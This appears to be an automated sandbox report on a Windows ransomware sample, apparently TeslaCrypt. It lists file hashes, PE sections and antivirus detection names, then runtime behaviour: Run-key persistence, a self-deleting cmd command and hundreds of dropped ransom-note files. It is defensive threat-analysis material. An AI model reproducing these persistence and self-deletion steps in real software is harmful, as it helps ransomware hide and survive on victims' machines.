Analysis Date2016-02-14 07:06:53
MD59f84cb528e05fada70371fddf0e36cbb
SHA18ce26dbdf8561ff92793f2e20d13f11ed2e35d76

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.koko md5: 85a986fffd7c8fd69e2eea532cc19a3f sha1: 0c6693920a3e22661ba10ffed572257aab438cd5 size: 26624
Section.okoz md5: 2d4b6afab46fc60fbaa658cc1b1abaa6 sha1: 14f0366b19c04990cc5a4a0172be0cb7d67874b3 size: 122880
Section.rdata md5: f120dc03ff469c423622a146e01e47a8 sha1: d9ddc4d51645b94fade6b9b85c6093989902e791 size: 51712
Section.data md5: 8269816a4b4c55bfc437d70132a6a460 sha1: 6dedb47fb341d3422341e76ebc3e03c05af7e5b1 size: 23552
Section.rsrc md5: 2819aff1bb8a89bf30e60ae159f11590 sha1: 5b74fbc76e99a8c62d988d98473001b183319e0c size: 190464
Timestamp2016-02-09 09:29:42
PackerMicrosoft Visual C++ ?.?
PEhash3de4c86a46b877d37045ee10d0f0936e13c07836
IMPhashee58a88ad6908d3ce187ad220cfd153c
AVCA (E-Trust Ino)Trojan.GenericKDZ.32063
AVRisingNo Virus
AVMcafeeRansomware-FDZ!9F84CB528E05
AVAvira (antivir)TR/Crypt.Xpack.446124
AVTwisterNo Virus
AVAd-AwareTrojan.GenericKDZ.32063
AVAlwil (avast)Win32:Malware-gen
AVEset (nod32)Win32/Kryptik.ENJR
AVGrisoft (avg)Crypt5.AHLQ
AVSymantecTrojan.Cryptlock.N!g2
AVFortinetW32/Generic.AC.3397790
AVBitDefenderTrojan.GenericKDZ.32063
AVK7Trojan ( 004dddb11 )
AVMicrosoft Security EssentialsRansom:Win32/Tescrypt.E
AVMicroWorld (escan)Trojan.GenericKDZ.32063
AVMalwareBytesTrojan.MalPack.PK
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVEmsisoftTrojan.GenericKDZ.32063
AVFrisk (f-prot)W32/Agent.XL.gen!Eldorado
AVIkarusTrojan.Win32.Crypt
AVZillya!No Virus
AVKasperskyTrojan-Ransom.Win32.Bitman.ihw
AVTrend MicroTROJ_FORUCON.BMC
AVVirusBlokAda (vba32)No Virus
AVCAT (quickheal)Ransom.Crowti.WR7
AVBullGuardTrojan.GenericKDZ.32063
AVArcabit (arcavir)Trojan.GenericKDZ.32063
AVClamAVNo Virus
AVDr. WebTrojan.Encoder.3817
AVF-SecureTrojan.GenericKDZ.32063

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\qbfejkb.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c DEL C:\8CE26D~1.EXE
Creates ProcessC:\Documents and Settings\Administrator\Application Data\qbfejkb.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\8CE26D~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\qbfejkb.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\qbfejkb.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\qbfejkb.exe\\x00
RegistryHKEY_CURRENT_USER\Software\D244BEFF994C1AED\data ➝
NULL
RegistryHKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+qll.txt
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_pdwbpstig.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+qll.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+qll.html
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+qll.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+qll.png
